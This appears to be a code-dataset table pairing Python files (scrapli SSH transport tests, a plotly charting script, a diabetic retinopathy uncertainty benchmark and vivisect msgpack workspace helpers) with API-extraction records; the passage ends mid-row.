code | apis | extract_api
---|---|---|
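Each row below pairs a Python source file (`code`) with the fully-qualified APIs it uses (`apis`) and per-call extraction records (`extract_api`). The sketch below shows one way to sanity-check a row by slicing the code string at the recorded offsets; the tuple layout `((start, end), qualified_name, ...)` is inferred from the rows themselves, and the helper name is ours, not part of the dataset.

```python
# Minimal sketch: assumed record layout, hypothetical helper name.
def check_row(code: str, extractions: list) -> None:
    """Print each extracted call by slicing the code string at its offsets."""
    for entry in extractions:
        (start, end), qualified_name = entry[0], entry[1]
        print(f"{qualified_name}: {code[start:end]!r}")
```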
import asyncio
from io import BytesIO

import pytest
from asyncssh.connection import SSHClientConnection
from asyncssh.stream import SSHReader
from scrapli.exceptions import ScrapliConnectionNotOpened, ScrapliTimeout


class DumbContainer:
    def __init__(self):
        self.preferred_auth = ()

    def __getattr__(self, item):
        # options has a billion attributes, just return None, doesn't matter for this test
        return None


def test_close(monkeypatch, asyncssh_transport):
    def _close(cls):
        pass

    monkeypatch.setattr(
        "asyncssh.connection.SSHClientConnection.close",
        _close,
    )

    # lie and pretend the session is already assigned
    options = DumbContainer()
    asyncssh_transport.session = SSHClientConnection(
        loop=asyncio.get_event_loop_policy().get_event_loop(), options=options
    )

    asyncssh_transport.close()

    assert asyncssh_transport.session is None
    assert asyncssh_transport.stdin is None
    assert asyncssh_transport.stdout is None


def test_close_catch_brokenpipe(monkeypatch, asyncssh_transport):
    def _close(cls):
        raise BrokenPipeError

    monkeypatch.setattr(
        "asyncssh.connection.SSHClientConnection.close",
        _close,
    )

    # lie and pretend the session is already assigned
    options = DumbContainer()
    asyncssh_transport.session = SSHClientConnection(
        loop=asyncio.get_event_loop_policy().get_event_loop(), options=options
    )

    asyncssh_transport.close()

    assert asyncssh_transport.session is None
    assert asyncssh_transport.stdin is None
    assert asyncssh_transport.stdout is None


def test_isalive_no_session(asyncssh_transport):
    assert asyncssh_transport.isalive() is False


def test_isalive(asyncssh_transport):
    # lie and pretend the session is already assigned
    options = DumbContainer()
    asyncssh_transport.session = SSHClientConnection(
        loop=asyncio.get_event_loop_policy().get_event_loop(), options=options
    )

    # lie and tell asyncssh auth is done
    asyncssh_transport.session._auth_complete = True

    # also have to lie and create a transport and have it return False when is_closing is called
    asyncssh_transport.session._transport = DumbContainer()
    asyncssh_transport.session._transport.is_closing = lambda: False

    assert asyncssh_transport.isalive() is True


def test_isalive_attribute_error(asyncssh_transport):
    # lie and pretend the session is already assigned
    options = DumbContainer()
    asyncssh_transport.session = SSHClientConnection(
        loop=asyncio.get_event_loop_policy().get_event_loop(), options=options
    )

    # lie and tell asyncssh auth is done
    asyncssh_transport.session._auth_complete = True

    assert asyncssh_transport.isalive() is False


async def test_read(monkeypatch, asyncssh_transport):
    async def _read(cls, _):
        return b"somebytes"

    monkeypatch.setattr(
        "asyncssh.stream.SSHReader.read",
        _read,
    )

    # lie and pretend the session is already assigned/stdout is already a thing
    asyncssh_transport.stdout = SSHReader("", "")

    assert await asyncssh_transport.read() == b"somebytes"


async def test_read_exception_not_open(asyncssh_transport):
    with pytest.raises(ScrapliConnectionNotOpened):
        await asyncssh_transport.read()


async def test_read_exception_timeout(monkeypatch, asyncssh_transport):
    async def _read(cls, _):
        await asyncio.sleep(0.5)

    monkeypatch.setattr(
        "asyncssh.stream.SSHReader.read",
        _read,
    )

    # lie and pretend the session is already assigned/stdout is already a thing
    asyncssh_transport.stdout = SSHReader("", "")
    asyncssh_transport._base_transport_args.timeout_transport = 0.1

    with pytest.raises(ScrapliTimeout):
        await asyncssh_transport.read()


def test_write(asyncssh_transport):
    asyncssh_transport.stdin = BytesIO()
    asyncssh_transport.write(b"blah")
    asyncssh_transport.stdin.seek(0)
    assert asyncssh_transport.stdin.read() == b"blah"


def test_write_exception(asyncssh_transport):
    with pytest.raises(ScrapliConnectionNotOpened):
        asyncssh_transport.write("blah")
| [
"asyncssh.stream.SSHReader",
"io.BytesIO",
"pytest.raises",
"asyncio.sleep",
"asyncio.get_event_loop_policy"
]
| [((3113, 3130), 'asyncssh.stream.SSHReader', 'SSHReader', (['""""""', '""""""'], {}), "('', '')\n", (3122, 3130), False, 'from asyncssh.stream import SSHReader\n'), ((3683, 3700), 'asyncssh.stream.SSHReader', 'SSHReader', (['""""""', '""""""'], {}), "('', '')\n", (3692, 3700), False, 'from asyncssh.stream import SSHReader\n'), ((3919, 3928), 'io.BytesIO', 'BytesIO', ([], {}), '()\n', (3926, 3928), False, 'from io import BytesIO\n'), ((3262, 3303), 'pytest.raises', 'pytest.raises', (['ScrapliConnectionNotOpened'], {}), '(ScrapliConnectionNotOpened)\n', (3275, 3303), False, 'import pytest\n'), ((3779, 3808), 'pytest.raises', 'pytest.raises', (['ScrapliTimeout'], {}), '(ScrapliTimeout)\n', (3792, 3808), False, 'import pytest\n'), ((4115, 4156), 'pytest.raises', 'pytest.raises', (['ScrapliConnectionNotOpened'], {}), '(ScrapliConnectionNotOpened)\n', (4128, 4156), False, 'import pytest\n'), ((3462, 3480), 'asyncio.sleep', 'asyncio.sleep', (['(0.5)'], {}), '(0.5)\n', (3475, 3480), False, 'import asyncio\n'), ((784, 815), 'asyncio.get_event_loop_policy', 'asyncio.get_event_loop_policy', ([], {}), '()\n', (813, 815), False, 'import asyncio\n'), ((1400, 1431), 'asyncio.get_event_loop_policy', 'asyncio.get_event_loop_policy', ([], {}), '()\n', (1429, 1431), False, 'import asyncio\n'), ((1931, 1962), 'asyncio.get_event_loop_policy', 'asyncio.get_event_loop_policy', ([], {}), '()\n', (1960, 1962), False, 'import asyncio\n'), ((2581, 2612), 'asyncio.get_event_loop_policy', 'asyncio.get_event_loop_policy', ([], {}), '()\n', (2610, 2612), False, 'import asyncio\n')] |
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import plotly.io as pio
from dataProcessor import parseLabels, parseLangs
import os

years = parseLabels()
langs = parseLangs()

# make the plotly results
fig = make_subplots(
    rows=1, cols=2,
    specs=[[{"type": "xy"}, {"type": "domain"}]],
)
fig.add_trace(go.Bar(y=list(langs.values()), x=list(langs.keys()), showlegend=False),
              row=1, col=1)
fig.add_trace(go.Pie(values=list(years.values()), labels=list(years.keys())),
              row=1, col=2)
fig.update_layout(height=600)
pio.write_html(fig, 'index.html', auto_open=True)
| [
"plotly.io.write_html",
"dataProcessor.parseLangs",
"plotly.subplots.make_subplots",
"dataProcessor.parseLabels"
]
| [((194, 207), 'dataProcessor.parseLabels', 'parseLabels', ([], {}), '()\n', (205, 207), False, 'from dataProcessor import parseLabels, parseLangs\n'), ((216, 228), 'dataProcessor.parseLangs', 'parseLangs', ([], {}), '()\n', (226, 228), False, 'from dataProcessor import parseLabels, parseLangs\n'), ((262, 337), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(1)', 'cols': '(2)', 'specs': "[[{'type': 'xy'}, {'type': 'domain'}]]"}), "(rows=1, cols=2, specs=[[{'type': 'xy'}, {'type': 'domain'}]])\n", (275, 337), False, 'from plotly.subplots import make_subplots\n'), ((613, 662), 'plotly.io.write_html', 'pio.write_html', (['fig', '"""index.html"""'], {'auto_open': '(True)'}), "(fig, 'index.html', auto_open=True)\n", (627, 662), True, 'import plotly.io as pio\n')] |
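`dataProcessor` in the row above is project-specific, so as a hedged, self-contained illustration of the same bar-plus-pie subplot layout, the snippet below substitutes made-up dictionaries for `parseLangs()` and `parseLabels()`.

```python
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import plotly.io as pio

langs = {"Python": 120, "JavaScript": 80, "Go": 15}  # hypothetical stand-in for parseLangs()
years = {"2019": 10, "2020": 25, "2021": 40}         # hypothetical stand-in for parseLabels()

fig = make_subplots(rows=1, cols=2, specs=[[{"type": "xy"}, {"type": "domain"}]])
fig.add_trace(go.Bar(x=list(langs.keys()), y=list(langs.values()), showlegend=False), row=1, col=1)
fig.add_trace(go.Pie(labels=list(years.keys()), values=list(years.values())), row=1, col=2)
fig.update_layout(height=600)
pio.write_html(fig, "index.html", auto_open=False)
```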
# Copyright 2019 BDL Benchmarks Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Diabetic retinopathy diagnosis BDL Benchmark."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
from typing import Callable
from typing import Dict
from typing import Optional
from typing import Sequence
from typing import Text
from typing import Tuple
from typing import Union
import numpy as np
import pandas as pd
import tensorflow as tf
from absl import logging
from ..core import transforms
from ..core.benchmark import Benchmark
from ..core.benchmark import BenchmarkInfo
from ..core.benchmark import DataSplits
from ..core.constants import DATA_DIR
from ..core.levels import Level
tfk = tf.keras
_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR = os.path.join(
DATA_DIR, "downloads", "manual", "diabetic_retinopathy_diagnosis")
class DiabeticRetinopathyDiagnosisBecnhmark(Benchmark):
"""Diabetic retinopathy diagnosis benchmark class."""
def __init__(
self,
level: Union[Text, Level],
batch_size: int = 64,
data_dir: Optional[Text] = None,
download_and_prepare: bool = False,
):
"""Constructs a benchmark object.
Args:
level: `Level` or `str`, downstream task level.
batch_size: (optional) `int`, number of datapoints
per mini-batch.
data_dir: (optional) `str`, path to parent data directory.
download_and_prepare: (optional) `bool`, if the data is not available
it downloads and preprocesses it.
"""
self.__level = level if isinstance(level, Level) else Level.from_str(level)
try:
self.__ds = self.load(level=level,
batch_size=batch_size,
data_dir=data_dir or DATA_DIR)
except AssertionError:
if not download_and_prepare:
raise
else:
logging.info(
"Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()`"
" is now running...")
self.download_and_prepare()
@classmethod
def evaluate(
cls,
estimator: Callable[[np.ndarray], Tuple[np.ndarray, np.ndarray]],
dataset: tf.data.Dataset,
output_dir: Optional[Text] = None,
name: Optional[Text] = None,
) -> Dict[Text, float]:
"""Evaluates an `estimator` on the `mode` benchmark dataset.
Args:
estimator: `lambda x: mu_x, uncertainty_x`, an uncertainty estimation
function, which returns `mean_x` and predictive `uncertainty_x`.
dataset: `tf.data.Dataset`, on which dataset to performance evaluation.
output_dir: (optional) `str`, directory to save figures.
name: (optional) `str`, the name of the method.
"""
import inspect
import tqdm
import tensorflow_datasets as tfds
from sklearn.metrics import roc_auc_score
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
# Containers used for caching performance evaluation
y_true = list()
y_pred = list()
y_uncertainty = list()
# Convert to NumPy iterator if necessary
ds = dataset if inspect.isgenerator(dataset) else tfds.as_numpy(dataset)
for x, y in tqdm.tqdm(ds):
# Sample from probabilistic model
mean, uncertainty = estimator(x)
# Cache predictions
y_true.append(y)
y_pred.append(mean)
y_uncertainty.append(uncertainty)
# Use vectorized NumPy containers
y_true = np.concatenate(y_true).flatten()
y_pred = np.concatenate(y_pred).flatten()
y_uncertainty = np.concatenate(y_uncertainty).flatten()
fractions = np.asarray([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
# Metrics for evaluation
metrics = zip(["accuracy", "auc"], cls.metrics())
return {
metric: cls._evaluate_metric(
y_true,
y_pred,
y_uncertainty,
fractions,
lambda y_true, y_pred: metric_fn(y_true, y_pred).numpy(),
name,
) for (metric, metric_fn) in metrics
}
@staticmethod
def _evaluate_metric(
y_true: np.ndarray,
y_pred: np.ndarray,
y_uncertainty: np.ndarray,
fractions: Sequence[float],
metric_fn: Callable[[np.ndarray, np.ndarray], float],
name=None,
) -> pd.DataFrame:
"""Evaluate model predictive distribution on `metric_fn` at data retain
`fractions`.
Args:
y_true: `numpy.ndarray`, the ground truth labels, with shape [N].
y_pred: `numpy.ndarray`, the model predictions, with shape [N].
y_uncertainty: `numpy.ndarray`, the model uncertainties,
with shape [N].
fractions: `iterable`, the percentages of data to retain for
calculating `metric_fn`.
metric_fn: `lambda(y_true, y_pred) -> float`, a metric
function that provides a score given ground truths
and predictions.
name: (optional) `str`, the name of the method.
Returns:
A `pandas.DataFrame` with columns ["retained_data", "mean", "std"],
that summarizes the scores at different data retained fractions.
"""
N = y_true.shape[0]
# Sorts indexes by ascending uncertainty
I_uncertainties = np.argsort(y_uncertainty)
# Score containers
mean = np.empty_like(fractions)
# TODO(filangel): do bootstrap sampling and estimate standard error
std = np.zeros_like(fractions)
for i, frac in enumerate(fractions):
# Keep only the %-frac of lowest uncertainties
I = np.zeros(N, dtype=bool)
I[I_uncertainties[:int(N * frac)]] = True
mean[i] = metric_fn(y_true[I], y_pred[I])
# Store
df = pd.DataFrame(dict(retained_data=fractions, mean=mean, std=std))
df.name = name
return df
@property
def datasets(self) -> tf.data.Dataset:
"""Pointer to the processed datasets."""
return self.__ds
@property
def info(self) -> BenchmarkInfo:
"""Text description of the benchmark."""
return BenchmarkInfo(description="", urls="", setup="", citation="")
@property
def level(self) -> Level:
"""The downstream task level."""
return self.__level
@staticmethod
def loss() -> tfk.losses.Loss:
"""Loss used for training binary classifiers."""
return tfk.losses.BinaryCrossentropy()
@staticmethod
def metrics() -> tfk.metrics.Metric:
"""Evaluation metrics used for monitoring training."""
return [tfk.metrics.BinaryAccuracy(), tfk.metrics.AUC()]
@staticmethod
def class_weight() -> Sequence[float]:
"""Class weights used for rebalancing the dataset, by skewing the `loss`
accordingly."""
return [1.0, 4.0]
@classmethod
def load(
cls,
level: Union[Text, Level] = "realworld",
batch_size: int = 64,
data_dir: Optional[Text] = None,
as_numpy: bool = False,
) -> DataSplits:
"""Loads the datasets for the benchmark.
Args:
level: `Level` or `str`, downstream task level.
batch_size: (optional) `int`, number of datapoints
per mini-batch.
data_dir: (optional) `str`, path to parent data directory.
as_numpy: (optional) `bool`, if True returns python generators
with `numpy.ndarray` outputs.
Returns:
A namedtuple with properties:
* train: `tf.data.Dataset`, train dataset.
* validation: `tf.data.Dataset`, validation dataset.
* test: `tf.data.Dataset`, test dataset.
"""
import tensorflow_datasets as tfds
from .tfds_adapter import DiabeticRetinopathyDiagnosis
# Fetch datasets
try:
ds_train, ds_validation, ds_test = DiabeticRetinopathyDiagnosis(
data_dir=data_dir or DATA_DIR,
config=level).as_dataset(split=["train", "validation", "test"],
shuffle_files=True,
batch_size=batch_size)
except AssertionError as ae:
raise AssertionError(
str(ae) +
" Run DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()"
" first and then retry.")
# Parse task level
level = level if isinstance(level, Level) else Level.from_str(level)
# Dataset transformations
transforms_train, transforms_eval = cls._preprocessors()
# Apply transformations
ds_train = ds_train.map(transforms_train,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds_validation = ds_validation.map(
transforms_eval, num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds_test = ds_test.map(transforms_eval,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
# Prefetches datasets to memory
ds_train = ds_train.prefetch(tf.data.experimental.AUTOTUNE)
ds_validation = ds_validation.prefetch(tf.data.experimental.AUTOTUNE)
ds_test = ds_test.prefetch(tf.data.experimental.AUTOTUNE)
if as_numpy:
# Convert to NumPy iterators
ds_train = tfds.as_numpy(ds_train)
ds_validation = tfds.as_numpy(ds_validation)
ds_test = tfds.as_numpy(ds_test)
return DataSplits(ds_train, ds_validation, ds_test)
@classmethod
def download_and_prepare(cls, levels=None) -> None:
"""Downloads dataset from Kaggle, extracts zip files and processes it using
`tensorflow_datasets`.
Args:
levels: (optional) `iterable` of `str`, specifies which
levels from {'medium', 'realworld'} to prepare,
if None it prepares all the levels.
Raises:
OSError: if `~/.kaggle/kaggle.json` is not set up.
"""
# Disable GPU for data download, extraction and preparation
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
cls._download()
# cls._extract()
#cls._prepare(levels)
@staticmethod
def _download() -> None:
"""Downloads data from Kaggle using `tensorflow_datasets`.
Raises:
OSError: if `~/.kaggle/kaggle.json` is not set up.
"""
import subprocess as sp
import tensorflow_datasets as tfds
# Append `/home/$USER/.local/bin` to path
os.environ["PATH"] += ":/home/{}/.local/bin/".format(os.environ["USER"])
# Download all files from Kaggle
drd = tfds.download.kaggle.KaggleCompetitionDownloader(
"diabetic-retinopathy-detection")
try:
for dfile in drd.competition_files:
drd.download_file(dfile,
output_dir=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
except sp.CalledProcessError as cpe:
raise OSError(
str(cpe) + "." +
" Make sure you have ~/.kaggle/kaggle.json setup, fetched from the Kaggle website"
" https://www.kaggle.com/<username>/account -> 'Create New API Key'."
" Also accept the dataset license by going to"
" https://www.kaggle.com/c/diabetic-retinopathy-detection/rules"
" and look for the button 'I Understand and Accept' (make sure when reloading the"
" page that the button does not pop up again).")
@staticmethod
def _extract() -> None:
"""Extracts zip files downloaded from Kaggle."""
import glob
import tqdm
import zipfile
import tempfile
# Extract train and test original images
for split in ["train", "test"]:
# Extract "<split>.zip.00*"" files to "<split>"
with tempfile.NamedTemporaryFile() as tmp:
# Concatenate "<split>.zip.00*" to "<split>.zip"
for fname in tqdm.tqdm(
sorted(
glob.glob(
os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR,
"{split}.zip.00*".format(split=split))))):
# Unzip "<split>.zip" to "<split>"
with open(fname, "rb") as ztmp:
tmp.write(ztmp.read())
with zipfile.ZipFile(tmp) as zfile:
for image in tqdm.tqdm(iterable=zfile.namelist(),
total=len(zfile.namelist())):
zfile.extract(member=image,
path=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
# Delete "<split>.zip.00*" files
for splitzip in os.listdir(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR):
if "{split}.zip.00".format(split=split) in splitzip:
os.remove(
os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, splitzip))
# Extract "sample.zip", "trainLabels.csv.zip"
for fname in ["sample", "trainLabels.csv"]:
zfname = os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR,
"{fname}.zip".format(fname=fname))
with zipfile.ZipFile(zfname) as zfile:
zfile.extractall(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
os.remove(zfname)
@staticmethod
def _prepare(levels=None) -> None:
"""Generates the TFRecord objects for medium and realworld experiments."""
import multiprocessing
from absl import logging
from .tfds_adapter import DiabeticRetinopathyDiagnosis
# Handle each level individually
for level in levels or ["medium", "realworld"]:
dtask = DiabeticRetinopathyDiagnosis(data_dir=DATA_DIR, config=level)
logging.debug("=== Preparing TFRecords for {} ===".format(level))
dtask.download_and_prepare()
@classmethod
def _preprocessors(cls) -> Tuple[transforms.Transform, transforms.Transform]:
"""Applies transformations to the raw data."""
import tensorflow_datasets as tfds
# Transformation hyperparameters
mean = np.asarray([0.42606387, 0.29752496, 0.21309826])
stddev = np.asarray([0.27662534, 0.20280295, 0.1687619])
class Parse(transforms.Transform):
"""Parses datapoints from raw `tf.data.Dataset`."""
def __call__(self, x, y=None):
"""Returns `as_supervised` tuple."""
return x["image"], x["label"]
class CastX(transforms.Transform):
"""Casts image to `dtype`."""
def __init__(self, dtype):
"""Constructs a type caster."""
self.dtype = dtype
def __call__(self, x, y):
"""Returns casted image (to `dtype`) and its (unchanged) label as
tuple."""
return tf.cast(x, self.dtype), y
class To01X(transforms.Transform):
"""Rescales image to [min, max]=[0, 1]."""
def __call__(self, x, y):
"""Returns rescaled image and its (unchanged) label as tuple."""
return x / 255.0, y
# Get augmentation schemes
[augmentation_config,
no_augmentation_config] = cls._ImageDataGenerator_config()
# Transformations for train dataset
transforms_train = transforms.Compose([
Parse(),
CastX(tf.float32),
To01X(),
transforms.Normalize(mean, stddev),
# TODO(filangel): handle batch with ImageDataGenerator
# transforms.RandomAugment(**augmentation_config),
])
# Transformations for validation/test dataset
transforms_eval = transforms.Compose([
Parse(),
CastX(tf.float32),
To01X(),
transforms.Normalize(mean, stddev),
# TODO(filangel): handle batch with ImageDataGenerator
# transforms.RandomAugment(**no_augmentation_config),
])
return transforms_train, transforms_eval
@staticmethod
def _ImageDataGenerator_config():
"""Returns the configs for the
`tensorflow.keras.preprocessing.image.ImageDataGenerator`, used for the
random augmentation of the dataset, following the implementation of
https://github.com/chleibig/disease-detection/blob/f3401b26aa9b832ff77afe93
e3faa342f7d088e5/scripts/inspect_data_augmentation.py."""
augmentation_config = dict(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=180.0,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.,
zoom_range=0.10,
channel_shift_range=0.,
fill_mode="constant",
cval=0.,
horizontal_flip=True,
vertical_flip=True,
data_format="channels_last",
)
no_augmentation_config = dict(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=0.0,
width_shift_range=0.0,
height_shift_range=0.0,
shear_range=0.,
zoom_range=0.0,
channel_shift_range=0.,
fill_mode="nearest",
cval=0.,
horizontal_flip=False,
vertical_flip=False,
data_format="channels_last",
)
return augmentation_config, no_augmentation_config
| [
"tensorflow_datasets.as_numpy",
"os.listdir",
"zipfile.ZipFile",
"tqdm.tqdm",
"numpy.asarray",
"os.path.join",
"inspect.isgenerator",
"absl.logging.info",
"numpy.argsort",
"numpy.zeros",
"numpy.empty_like",
"numpy.concatenate",
"tempfile.NamedTemporaryFile",
"tensorflow_datasets.download.kaggle.KaggleCompetitionDownloader",
"tensorflow.cast",
"numpy.zeros_like",
"os.remove"
]
| [((1435, 1514), 'os.path.join', 'os.path.join', (['DATA_DIR', '"""downloads"""', '"""manual"""', '"""diabetic_retinopathy_diagnosis"""'], {}), "(DATA_DIR, 'downloads', 'manual', 'diabetic_retinopathy_diagnosis')\n", (1447, 1514), False, 'import os\n'), ((3842, 3855), 'tqdm.tqdm', 'tqdm.tqdm', (['ds'], {}), '(ds)\n', (3851, 3855), False, 'import tqdm\n'), ((4258, 4300), 'numpy.asarray', 'np.asarray', (['[0.5, 0.6, 0.7, 0.8, 0.9, 1.0]'], {}), '([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])\n', (4268, 4300), True, 'import numpy as np\n'), ((5816, 5841), 'numpy.argsort', 'np.argsort', (['y_uncertainty'], {}), '(y_uncertainty)\n', (5826, 5841), True, 'import numpy as np\n'), ((5877, 5901), 'numpy.empty_like', 'np.empty_like', (['fractions'], {}), '(fractions)\n', (5890, 5901), True, 'import numpy as np\n'), ((5984, 6008), 'numpy.zeros_like', 'np.zeros_like', (['fractions'], {}), '(fractions)\n', (5997, 6008), True, 'import numpy as np\n'), ((10740, 10827), 'tensorflow_datasets.download.kaggle.KaggleCompetitionDownloader', 'tfds.download.kaggle.KaggleCompetitionDownloader', (['"""diabetic-retinopathy-detection"""'], {}), "(\n 'diabetic-retinopathy-detection')\n", (10788, 10827), True, 'import tensorflow_datasets as tfds\n'), ((13982, 14030), 'numpy.asarray', 'np.asarray', (['[0.42606387, 0.29752496, 0.21309826]'], {}), '([0.42606387, 0.29752496, 0.21309826])\n', (13992, 14030), True, 'import numpy as np\n'), ((14044, 14091), 'numpy.asarray', 'np.asarray', (['[0.27662534, 0.20280295, 0.1687619]'], {}), '([0.27662534, 0.20280295, 0.1687619])\n', (14054, 14091), True, 'import numpy as np\n'), ((3768, 3796), 'inspect.isgenerator', 'inspect.isgenerator', (['dataset'], {}), '(dataset)\n', (3787, 3796), False, 'import inspect\n'), ((3802, 3824), 'tensorflow_datasets.as_numpy', 'tfds.as_numpy', (['dataset'], {}), '(dataset)\n', (3815, 3824), True, 'import tensorflow_datasets as tfds\n'), ((6114, 6137), 'numpy.zeros', 'np.zeros', (['N'], {'dtype': 'bool'}), '(N, dtype=bool)\n', (6122, 6137), True, 'import numpy as np\n'), ((9526, 9549), 'tensorflow_datasets.as_numpy', 'tfds.as_numpy', (['ds_train'], {}), '(ds_train)\n', (9539, 9549), True, 'import tensorflow_datasets as tfds\n'), ((9572, 9600), 'tensorflow_datasets.as_numpy', 'tfds.as_numpy', (['ds_validation'], {}), '(ds_validation)\n', (9585, 9600), True, 'import tensorflow_datasets as tfds\n'), ((9617, 9639), 'tensorflow_datasets.as_numpy', 'tfds.as_numpy', (['ds_test'], {}), '(ds_test)\n', (9630, 9639), True, 'import tensorflow_datasets as tfds\n'), ((12643, 12695), 'os.listdir', 'os.listdir', (['_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR'], {}), '(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)\n', (12653, 12695), False, 'import os\n'), ((13209, 13226), 'os.remove', 'os.remove', (['zfname'], {}), '(zfname)\n', (13218, 13226), False, 'import os\n'), ((4103, 4125), 'numpy.concatenate', 'np.concatenate', (['y_true'], {}), '(y_true)\n', (4117, 4125), True, 'import numpy as np\n'), ((4149, 4171), 'numpy.concatenate', 'np.concatenate', (['y_pred'], {}), '(y_pred)\n', (4163, 4171), True, 'import numpy as np\n'), ((4202, 4231), 'numpy.concatenate', 'np.concatenate', (['y_uncertainty'], {}), '(y_uncertainty)\n', (4216, 4231), True, 'import numpy as np\n'), ((11855, 11884), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {}), '()\n', (11882, 11884), False, 'import tempfile\n'), ((13102, 13125), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zfname'], {}), '(zfname)\n', (13117, 13125), False, 'import zipfile\n'), ((2520, 2642), 'absl.logging.info', 'logging.info', 
(['"""Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()` is now running..."""'], {}), "(\n 'Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()` is now running...'\n )\n", (2532, 2642), False, 'from absl import logging\n'), ((12315, 12335), 'zipfile.ZipFile', 'zipfile.ZipFile', (['tmp'], {}), '(tmp)\n', (12330, 12335), False, 'import zipfile\n'), ((14628, 14650), 'tensorflow.cast', 'tf.cast', (['x', 'self.dtype'], {}), '(x, self.dtype)\n', (14635, 14650), True, 'import tensorflow as tf\n'), ((12793, 12857), 'os.path.join', 'os.path.join', (['_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR', 'splitzip'], {}), '(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, splitzip)\n', (12805, 12857), False, 'import os\n')] |
import base64
import logging

import msgpack

logger = logging.getLogger(__name__)

loadargs = {'use_list': False, 'raw': False}
if msgpack.version < (1, 0, 0):
    loadargs['encoding'] = 'utf-8'
else:
    loadargs['strict_map_key'] = False

VSIG = b'MSGVIV'.ljust(8, b'\x00')


def vivEventsAppendFile(filename, events):
    with open(filename, 'ab') as f:
        for event in events:
            if event[0] == 20:
                mape = base64.b64encode(event[1][3])
                event = (event[0], (event[1][0], event[1][1], event[1][2], mape))
            msgpack.pack(event, f, use_bin_type=False)


def saveWorkspaceChanges(vw, filename):
    events = vw.exportWorkspaceChanges()
    vivEventsAppendFile(filename, events)


def vivEventsToFile(filename, events):
    with open(filename, 'wb') as f:
        msgpack.pack(VSIG, f, use_bin_type=False)
        for event in events:
            if event[0] == 20:
                mape = base64.b64encode(event[1][3])
                event = (event[0], (event[1][0], event[1][1], event[1][2], mape))
            msgpack.pack(event, f, use_bin_type=False)


def saveWorkspace(vw, filename):
    events = vw.exportWorkspace()
    vivEventsToFile(filename, events)


def vivEventsFromFile(filename):
    events = []
    with open(filename, 'rb') as f:
        unpacker = msgpack.Unpacker(f, **loadargs)
        siggy = next(unpacker)
        if siggy.encode('utf-8') != VSIG:
            logger.warning('Invalid file signature of %s', str(siggy))
            return
        for event in unpacker:
            if event[0] == 20:
                mape = base64.b64decode(event[1][3])
                event = (event[0], (event[1][0], event[1][1], event[1][2], mape))
            events.append(event)
    return events


def loadWorkspace(vw, filename):
    events = vivEventsFromFile(filename)
    vw.importWorkspace(events)
| [
"logging.getLogger",
"msgpack.pack",
"base64.b64encode",
"base64.b64decode",
"msgpack.Unpacker"
]
| [((55, 82), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (72, 82), False, 'import logging\n'), ((818, 859), 'msgpack.pack', 'msgpack.pack', (['VSIG', 'f'], {'use_bin_type': '(False)'}), '(VSIG, f, use_bin_type=False)\n', (830, 859), False, 'import msgpack\n'), ((1323, 1354), 'msgpack.Unpacker', 'msgpack.Unpacker', (['f'], {}), '(f, **loadargs)\n', (1339, 1354), False, 'import msgpack\n'), ((565, 607), 'msgpack.pack', 'msgpack.pack', (['event', 'f'], {'use_bin_type': '(False)'}), '(event, f, use_bin_type=False)\n', (577, 607), False, 'import msgpack\n'), ((1067, 1109), 'msgpack.pack', 'msgpack.pack', (['event', 'f'], {'use_bin_type': '(False)'}), '(event, f, use_bin_type=False)\n', (1079, 1109), False, 'import msgpack\n'), ((441, 470), 'base64.b64encode', 'base64.b64encode', (['event[1][3]'], {}), '(event[1][3])\n', (457, 470), False, 'import base64\n'), ((943, 972), 'base64.b64encode', 'base64.b64encode', (['event[1][3]'], {}), '(event[1][3])\n', (959, 972), False, 'import base64\n'), ((1603, 1632), 'base64.b64decode', 'base64.b64decode', (['event[1][3]'], {}), '(event[1][3])\n', (1619, 1632), False, 'import base64\n')] |
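A hedged round-trip sketch for the event-file helpers above. The path and event tuples are made up for illustration; real event lists come from a vivisect workspace via `vw.exportWorkspace()`, and the helpers are assumed to be in scope.

```python
import os
import tempfile

events = [(1, ('va', 0x1000)), (2, ('name', 'entry_point'))]   # made-up events
path = os.path.join(tempfile.mkdtemp(), 'demo.viv')            # hypothetical path
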